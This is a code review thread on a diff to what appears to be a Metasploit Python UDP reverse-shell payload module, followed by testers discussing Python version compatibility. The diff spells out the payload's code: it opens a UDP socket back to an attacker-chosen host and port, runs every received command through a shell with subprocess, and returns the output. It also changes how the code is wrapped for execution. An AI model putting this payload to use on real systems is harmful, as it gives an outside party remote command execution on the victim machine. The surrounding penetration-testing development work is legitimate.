modules/payloads/singles/python/shell_reverse_udp.rb

```diff
@@ -47,22 +48,19 @@ def command_string
     cmd = ''
     dead = Rex::Text.rand_text_alpha(2)
     # Set up the socket
-    cmd << "import socket,os\n"
+    cmd << "import socket,subprocess\n"
     cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n"
     cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
     # The actual IO
     cmd << "#{dead}=False\n"
     cmd << "while not #{dead}:\n"
     cmd << "\tdata=so.recv(1024)\n"
     cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
-    cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
-    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
+    cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
+    cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
-    cmd
+    py_create_exec_stub(cmd)
```

Comment:
This one is not working for my on Python 2.7 or 3.7. I don't get a session established, and Python just hangs. There's no stacktrace or visible error.

Reply:
This is still broken. I'll check how/if it worked before

Reply:
Thanks! Let me know when you'd like me to retest it.

Reply:
This fails now on versions 2.3, 2.4, and 2.5 however it is working on 2.6, 2.7, and 3.4+. The issues with 2.3-2.5 seem to be the `b'` prefix for the bytes literal, and the issues with 3.1-3.2 (I couldn't test 3.3) was the `execv` call has to take strings instead of bytes. I think this version coverage is sufficient and I'll just update the module to note it accurately.